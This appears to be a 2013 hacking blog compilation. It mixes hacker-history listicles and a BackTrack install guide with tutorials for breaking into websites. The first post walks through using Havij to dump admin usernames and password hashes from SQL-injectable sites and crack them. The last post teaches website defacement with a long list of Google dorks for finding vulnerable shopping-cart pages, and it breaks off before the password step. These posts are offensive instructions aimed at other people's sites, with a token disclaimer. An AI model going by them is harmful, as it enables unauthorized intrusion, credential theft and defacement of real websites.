Saturday, 24 August 2013

DEFACING A WEBSITE WITH HAVIJ TOOL

How to use Havij Tool to Hack and Deface a websites.

As per Request we are Posting Hacking Tool and how to use it. Firstly, if you haven’t downloaded Havij, I strongly recommend you do download before moving on with this tutorial. Click Download Button at the End of the tutorial and if you have not read Sql Injection Tutorial i suggest you also do that before moving ahead for your own good so Click Here To Read about It
=>NOW TO TODAY'S TUTORIAL

Step 1: Run Havij. Now copy paste the SQL Injection vulnerable website into TARGET and click the ANALYZE BUTTON .To find vulnerable sites Learn More

Step 2: Be patient while havij gets all the information about the website like Database Name, Server, Etc.

Step 3: Now, we need to get the table of the website. Now click on Tables and click on Get tables and exercise some patience to get the database tables .

After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure.

Now to the final stage, Click on 'get data' to get the password and username of admin.

Now you have the admin usernames and password. Simply take note of only the username.

The password you got is in Md5 format and cannot be used to login to the website directly. What we need to do is too simply click on the MD5 tab on havij and paste the password into the text field and click on start.

Our Partner Site:

Visit https://www.faadoocoupons.com

Thursday, 22 August 2013

MOST FAMOUS HACKER GROUP EVER

10 Most Famous Hacker Groups Ever

The word “hack” began as a term for an “ingenious solution to a problem.” Then, with the onset of computer programming, it evolved to mean “a feat of programming prowess.” Teenage boys, attracted to the elite power they could wield, immersed themselves in a world of Internet bulletin boards and telephone systems. The lure of the next big challenge, hacker-group rivalries, political activism and personal gain all come into play in this fascinating underground world – in which everything is painted in shades of gray.

10. Chaos Computer Club

The Chaos Computer Club was formed on September 12, 1981 in Berlin. The group gained worldwide notoriety by hacking into the German Bildschirmtext computer network and debiting 134,000 Deutsch Marks from a Hamburg bank. They returned the money the next day, having proven their point: the system’s security was flawed.
Some members of the club were also involved in a cyberespionage case in 1989. They hacked into corporate and government computers in the US and sold the source code to the KGB. The Chaos Computer Club also used hacking to protest French nuclear testing, to publish the fingerprints of Germany’s Minister of the Interior, Wolfgang Schäuble, and to expose a government Trojan horse spyware device.

9. Global KOS

The goal of Global kOS (pronounced “chaos”) was exactly that: to create as much online disorder as possible on a global scale. Consisting of members with handles like AcidAngel, The Assassin and Shadow Hunter, the group was responsible for providing a slew of automated hacker tools to the online community. This meant that so-called “script-kiddies,” who don’t necessarily have any true computer programming abilities, could wreak havoc without much technical knowhow.
Created in 1996 by AcidAngel, “Up Yours!” was a denial of service tool used to bring down the websites of 40 politicians, including that of Rush Limbaugh, as well as those of MTV and the Ku Klux Klan. Other tools developed by Global kOS include the kOS Crack, for cracking passwords, and BattlePong, an IRC flooding utility.

8. The Level Seven Crew

The Level Seven Crew is believed to have taken its name from the seventh level of hell (“the violent”) in Dante’s famous poetic allegory, “The Inferno.”
In 1999 alone, Level Seven illegally infiltrated over 60 computer systems, including those of NASA, The First American National Bank, and Sheraton Hotels. They also broke into the website of the US Embassy in China and defaced it with racist slogans to protest the United States’ accidental bombing of the Chinese Embassy in Belgrade. And they were apparently the first group to hack into a .ma (Moroccan) domain. Most of their exploits tended towards “hacktivism,” a form of online activism, rather than being motivated by personal gain. The group disbanded in 2000.

7. globalHell

The hacker group globalHell has been compared to a gang of thugs; but instead of battling it out on the streets, they took their fight into cyberspace. The group is said to have attacked and destroyed data on 115 websites, caused millions of dollars in damages, and trafficked stolen information.
Ironically, globalHell was co-founded by a known Houston street gang member named Patrick Gregory, who turned to computers as a “way out” of gang life. However, he ended up transferring his gang-related activity to the web, where he helped coordinate a 60-member syndicate.
Global Hell not only carried out an online version of extortion; they also went as far as attacking and defacing the United States Army’s website, vandalizing it with the message, “globalHell will not die.” Twenty-year-old Wisconsin-based co-founder Chad Davis was arrested in 1999, sentenced to six months in prison, and ordered to pay $8,054. In an amusing twist, he has since gone on to become an independent security consultant.

6. TeaMp0isoN

A 16-year-old hacker who goes by the online name TriCk started TeaMp0isoN in 2010. The group was responsible for hacking into Facebook, NATO, and the English Defense League. They also hacked into an email account and retrieved personal data about former British Prime Minister Tony Blair. And when Research In Motion, the company responsible for developing the BlackBerry smartphone, planned to help police during the 2011 England riots, TeaMp0isoN defaced the official BlackBerry blog, writing, “We are all for the rioters that are engaging in attacks on the police and government.”
The group also hacked the British Anti-terrorism Hotline to protest the extradition of suspects to the US. The group claims to be politically motivated, aiming to expose international governments hiding their wrongdoings.

5. Network Crack Program Hacker Group

The Network Crack Program Hacker Group (NCPH) was formed in 1994, in Zigong, China. In 2006, the group was thought to consist of around 10 members, with four key players at the helm. It’s actually said that the group’s leader, Wicked Rose (real name Tan Dailin), works for the Chinese Army. The current size of the group is unknown.
Initially, NCPH got their kicks hacking into a large proportion of Chinese hacker association websites. Yet their attacks soon evolved. In 2006, Wicked Rose’s GinWui rootkit was employed in attacks on the US Department of Defense. And later that year, Internet security consultancy iDefense linked the group with a number of notable online attacks.
The group is also well known for the remote-network-control and network-infiltration programs they have available for download. What’s more, according Wicked Rose, NCPH is paid for their work by a mysterious sponsor. It is believed that the group’s benefactor is the People’s Liberation Army.

4. LulzSec

One of LulzSec’s mottos is “Laughing at your security since 2011.” The group enjoys exposing security weaknesses and flaws, and their targets have included Fox.com, an X-Factor database (they released the contact information for 73,000 contestants), Sony, the CIA, and the FBI. They are said to have caused billions of dollars in damages.
In March 2012, top members of LulzSec were arrested, after their leader, code-named Sabu, turned them over to the FBI to face charges of conspiracy. A mere three months later, the group reemerged, hacking into a dating website for singles in the military. They dumped 170,937 email accounts, claiming that Lulzsec had been “reborn.”

3. Masters of Deception

New York hacker group Masters of Deception was formed in 1989, as a bitter rival to Texas-based hackers Legion of Doom. The groups’ one-upmanship soon evolved into all out war, with racial and class overtones adding extra tension.
To prove their hacking prowess, Masters of Deception members allegedly carried out what has been dubbed “one of the most extensive thefts of computer information ever reported.” According to reports, they broke into tough-to-crack servers and stole confidential information, which they later sold. Secret Service members carried out major raids and succeeded in indicting five top hackers in the group. They were charged with “computer tampering, computer and wire fraud, illegal wiretapping, and conspiracy.” All five pleaded guilty.

2. Milw0rm

On June 3, 1998, a group of hacktivists known as Milw0rm targeted the computers of India’s primary nuclear facility, the Bhabha Atomic Research Center. The group operated from the UK, the US, Russia and New Zealand, and they broke through the center’s firewalls. They lifted five megabytes of classified files about India’s last five nuclear tests, erased data from two servers, and posted anti-nuclear messages on the center’s website. The implications of the hack were huge and caused major upheaval as other institutions heightened their security.
One month later, Milw0rm hacked into a web hosting company named EasySpace, and within an hour they had posted their anti-nuclear message on 300 websites, including those of the FIFA World Cup, Drew Barrymore, Wimbledon, and the Saudi Royal Family.

1. Anonymous

Anonymous is a huge, amorphous group of hackers that has gained considerable momentum over the past couple of years. On January 19, 2012, more than 5,635 people (some unknowingly) joined a distributed denial-of-service attack against supporters of the Stop Online Piracy Act. The sites they disabled included the FBI website, as well as those of the Justice Department, the Motion Picture Association of America, and Universal Music Group.
Other Anonymous activities include protesting UK extradition policies, tracking down cyber-criminals (such as “Internet predator” Chris Forcand), and taking down child porn sites hidden in the depths of the worldwide web. Anonymous has threatened Mexican drug cartel group “Los Zetas,” attacked the Pentagon, threatened to take down Facebook, and waged war on Scientology. The group’s motto is “We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us.”

Our Partner Site:

Visit https://www.faadoocoupons.com

INSTALLING BACKTRACK 5

Installing BackTrack

In the last post i showed you how to install virtual box and after that setting up environment
for BackTrack. Today i will show you how to install BackTrack on Virtual machine.

Installing BackTrack on the virtual disk image

1. Open the VirtualBox Manager and select Let's_Hack guest machine on the left of the
screen. Click on the large Start .
2. Your machine will now boot up. As far we have not selected an image to be used to
boot the system with, we will need to select this using the menu options that will appear
prior to the initial system initialization.
3. The First Run Wizard will only appear the virtual machine is started. It allows you to choose
the ISO you wish to boot up from.
4. It is also possible to add the installation media in the Virtual Machine Settings in the Storage
category.
5. Click on Next to continue.
7. On the Select Installation Media screen you will need to set the location of the BackTrack iso
file which you have downloaded. Click on Next when ready.
8. Click on Start .

9. Type startx at the root@root:~# prompt.

10.Now that we have the BackTrack ISO up and running on our virtual machine, Now click on
the Install BackTrack icon to begin the short installation process:
11.Select your preferred language and click on Forward.
12.Select your location date and time.Click on Forward to continue.
13.Select your preferred keyboard layout and click on Forward.
14.Choose the Erase and use the entire disk radial button and click on Forward.
15.Click on Install to initialize the changes. This may take a few minutes to complete.
16.When the install has finished you will be required to reboot the system. Click on the
Restart Now button and then unload the ISO. You will need to choose Devices >
CD/DVD Devices> BackTrack Iso file name.This will eject the ISO image before
the system reboots. Press Enter to reboot.

Our Partner Site:

Visit https://www.faadoocoupons.com

HACKERS OF ALL TIME

Science

Next Previous Random List

Technology

Top 10 Notorious Black Hat Hackers

Chandler Grant May 8, 2012

Check out our new companion site: http://knowledgenuts.com

To accompany the technological advancements of the computer world and the constant changing definition of a hacker, we thought it was time to look back at ten of the most notorious black hat hackers and the legendary hacks that earned them such a title. First, it should be known that a black hat hacker is computing slang for a person who engages in illegal or malicious hacking. A white hat hacker is a computer hacker who intends to improve internet security. It is note-worthy that many white hat hackers, such as Steve Jobs of apple, Mark Zuckerberg of Facebook, and even many hackers listed below, were once black hat hackers.

Kevin Poulsen

a.k.a. Dark Dante

The notorious ’80s black hat hacker, Kevin Poulsen, gained recognition for his hacking of the telephone lines for LA radio station KIIS-FM, securing himself a place as the 102nd caller and winning a brand new Porsche 944, among other prizes. Law enforcement dubbed Poulsen the “Hannibal Lecter of computer crime.” Poulsen went underground as a fugitive when the FBI began its search for him, but in 1991, he was finally captured.
He pleaded guilty to seven counts of mail, wire and computer fraud, money laundering, obstruction of justice, and for obtaining information on covert businesses run by the FBI. Kevin Poulsen was sentenced to 51 months in prison (4 years and 3 months), which was the longest sentence ever given for hacking at the time. However, since serving time, Poulsen has worked as a journalist and is now a senior editor for Wired News. Poulsen’s most note-worthy article details his work on identifying 744 sex offenders with MySpace profiles.

Albert Gonzalez

Cyber-criminal Albert Gonzalez has been accused of masterminding the biggest ATM and credit card theft in history; from 2005 to 2007, he and his cybergroup had allegedly sold more than 170 million card and ATM numbers. Gonzalez’s team used SQL injection techniques to create malware backdoors on several corporate systems in order to launch packet-sniffing (specifically, ARP Spoofing) attacks, allowing him to steal computer data from internal corporate networks. When he was arrested, authorities seized $1.6 million in cash including $1.1 million found in plastic bags placed in a three-foot drum which had been buried in his parents’ backyard. In 2010, Gonzalez was sentenced to 20 years in federal prison.

Vladimir Levin

It’s almost like the opening of a James Bond movie: in 1994, while working from his laptop from his Russian apartment in St. Petersburg, Vladimir Levin transferred $10 million from the accounts of Citibank clients to his own accounts around the world.
However, Levin’s career as a hacker was only short lived, with a capture, imprisonment and recovery of all but $400,000 of the original $10 million. During Levin’s 1997 trial in the United States, he was said to have coordinated the first ever internet bank raid. The truth is Levin’s ability to transfer Citibank client funds to his own accounts was possible through stolen account numbers and PINs. Levin’s scam was a simple interception of clients’ calls while recording the punched in account numbers.

Robert Tappan Morris

On November 2, 1988, Robert Morris released a worm that took down one-tenth of the Internet, crippling 6,000 plus computer systems. It didn’t take long for the police to track him down. Due in part to the need for social acceptance that seems to be common amongst many young hackers, Morris made the fault of chatting about his worm for months before its release on the Internet. Morris claimed it was just a stunt, and added that he truly regretted causing $15 million worth of damage: the estimated amount of carnage his worm left behind.
Morris was one of the first to be tried and convicted under the Computer Fraud and Abuse Act but only had community service and a fine as his penalty. The defense for such a light sentence was that Morris’ worm didn’t destroy the actual contents of affected computers. Morris now works in the department of Electrical Engineering and Computer Science at Massachusetts Institute of Technology (MIT).

Michael Calce

a.k.a. MafiaBoy

In February of 2000, Michael Calce launched a series of widely known denial-of-service attacks against large commercial websites, including Yahoo!, Amazon.com, Dell, eBay, and CNN. He hacked Yahoo! when it was still the web’s leading search engine and caused it to shutdown for about an hour. Like many hackers, Calce exploited websites primarily for pride and establishing dominance for himself and his cybergroup, TNT. In 2001, the Montreal Youth Court sentenced Calce to eight months of open custody, one year of probation, restricted use of the Internet, and a minimal fine.

David Smith

Smith’s fame is due to being the author of the infamous e-mail virus, Melissa. Smith claims that the Melissa virus was never intended to cause harm, but its simple means of propagation (each infected computer sent out multiple infected emails) overloaded computer systems and servers around the world. Smith’s virus takes an unusual turn in that it was originally hidden in a file that contained passwords to 80 well-known pornography websites. The name Melissa was derived from a lap dancer Smith met while on a trip in Florida. Even though over 60,000 email viruses have been discovered, Smith is the only person to go to federal prison in the United States for sending one.

Adrian Lamo

Nicknamed “the homeless hacker,” Adrian Lamo used coffee shops, libraries and internet cafés as his locations for hacking. Apart from being the homeless hacker, Lamo is widely-known for breaking into a series of high-profile computer networks, which include The New York Times, Microsoft, Yahoo!, and MCI WorldCom. In 2002, he added his name to the The New York Times’ internal database of expert sources and utilized LexisNexis account to conduct research on high-profile subjects. The Times filed a complaint, and a warrant for Lamo’s arrest was issued, followed by a 15-month investigation by federal prosecutors in New York.
After several days in hiding, he finally surrendered to the US Marshals, and then to the FBI. Lamo was ordered to pay approximately $65,000 in damages and was sentenced to six months house arrest at his parents’ home, with an additional two years of probation. In June 2010, Lamo disclosed the name of Bradley Manning to U.S. Army authorities as the source of the July 12, 2007 Baghdad airstrike video leak to Wikileaks. Lamo is presently working as a threat analyst and donates his time and skills to a Sacramento-based nonprofit organization.

George Hotz

The name of the acclaimed jailbreak artist, George Hotz, will forever be associated with the April 2011 PlayStation breach. Being one of the first hackers ever to jailbreak the Sony PlayStation 3, Hotz found himself in the midst of a very relentless, public and messy court battle with Sony – perhaps worsened by Hotz’s public release of his jail breaking methods. In a stated retaliation to Sony’s gap of the unstated rules of jail breaking – never prosecute – the hacker group Anonymous attacked Sony in what would be the dubbed as the most costly security break of all time to date.
Hackers broke into the PlayStation Network and stole personal information of some 77 million users. However, Hotz denied any responsibility for the attack, and added “Running homebrew and exploring security on your devices is cool; hacking into someone else’s server and stealing databases of user info. is not cool.”

Jonathan James

a.k.a. c0mrade

Jonathan James, 16-year-old black hat hacker, became the first juvenile imprisoned for cybercrime in the United States. James gained his notoriety by implementing a series of successful intrusions into various systems. At an amazingly young age of 15, James specialized in hacking high-profile government systems such as NASA and the Department of Defense. He was reported to have stolen software worth over $1.7 million. He also hacked into the Defense Threat Reduction Agency and intercepted over 3,000 highly secretive messages passing to and from the DTRA employees, while collecting many usernames and passwords.
On May 18, 2008, at the age of 25, James committed suicide using a gun. The words in his suicide note provide some insight into this obviously brilliant but troubled youth who thought he would be a scapegoat and blamed for cyber crimes he did not commit: “I have no faith in the ‘justice’ system. Perhaps my actions today, and this letter, will send a stronger message to the public. Either way, I have lost control over this situation, and this is my only way to regain control.”

Gary McKinnon

In 2002, an exceptionally odd message appeared on a US Army computer screen: “Your security system is crap,” it read. “I am Solo. I will continue to disrupt at the highest levels.” It was later identified as the work of Scottish systems administrator, Gary McKinnon.
McKinnon suffers from Asperger’s syndrome, which is the least severe form of autism. The symptoms of Asperger’s syndrome certainly match Gary’s actions: that is, highly intelligent with an exceptional understanding of complex systems. Though sufferers often have difficulty reading social cues and acknowledging the impact of their often-obsessive behavior, they tend to be geniuses in one particular subject. For Gary, it was computers.
Gary has been accused of executing the largest ever hack of United States government computer networks — including Army, Air Force, Navy and NASA systems. The court had recommended that McKinnon be apprehended to the United States to face charges of illegally accessing 97 computers, causing a total of $700,000 in damage. Even more interesting are McKinnon’s motives for the large scale hackings, which he claims were in search of information on UFOs. He believed the US government was hiding such information in its military computers.

Kevin Mitnick

220Px-%D0%9A%D0%B5%D0%B2%D0%B8%D0%Bd %D0%9C%D0%B8%D1%82%D0%Bd%D0%B8%D0%Ba Ctqxfc

Kevin David Mitnick (born on August 6, 1963) is an American computer security consultant, author, and hacker. In the late 20th century, he was convicted of various computer- and communications-related crimes. At the time of his arrest, he was the most-wanted computer criminal in the United States. Mitnick gained unauthorized access to his first computer network in 1979, at 16, when a friend gave him the phone number for the Ark, the computer system Digital Equipment Corporation (DEC) used for developing their RSTS/E operating system software. He broke into DEC’s computer network and copied their software, a crime he was charged with and convicted of in 1988.
According to the U.S. Department of Justice, Mitnick gained unauthorized access to dozens of computer networks while he was a fugitive. He used cloned cellular phones to hide his location and, among other things, copied valuable proprietary software from some of the country’s largest cellular telephone and computer companies. Mitnick also intercepted and stole computer passwords, altered computer networks, and broke into and read private e-mail.
Due to his fame he is included as a bonus entry here.

Our Partner Site:

Visit https://www.faadoocoupons.com

HOW TO DEFACE A WEBSITE USING SQL AND PHP SCRIPTING

Note: I and thesspyhunter.blogspot.in is Not responsible for any Misuse of these Tutorials. These are Just for Educational Purposes...So Don't Misuse Them!

Now Our Todays Discussion is on " How to Deface Websites using the SQL injection and PHP shell code Scripting".. Today I will show you the 100% working method for Hacking Websites and then Defacing them...

Hacking class 14 - How to Deface Websites using SQL and Php scripting

FIRST OF ALL YOU SHOULD KNOW WHAT IS DEFACEMENT??
Defacing a website simply means that we replace the index.html file of a site by our file. Now all the Users that open it will see our Page(i.e being uploaded by us).
For Defacing a website, three things that you need Most are:
1. SQL Injection(For analyzing website loops)
2. Admin Password
3. Shell Script (for getting Admin Controls)

Now Lets Start the Tutorial:
First of all I would Like to say that I have took some part of SQL injection Tutorial from my previous posts and a site http://www.milw0rm.com/ .Most of the Part is written by me so if you have any doubts I will clear them....

1. Finding the Target and the Admin Password
First of all we must find out our target website. I have collected a lot of dorks i.e the vulnerability points of the websites. Some Google Searches can be awesomely utilized to find out vulnerable Websites.. Below is example of some queries..
Examples: Open the Google and copy paste these queries...

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

Here are some More Queries (use them without quotation marks)..

"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID

Now The Admin password Hacking procedure starts:

You can also refer to my previous post of hacking websites:

Hacking websites : How to hack websites By using SQL Injection

SPY HUNTER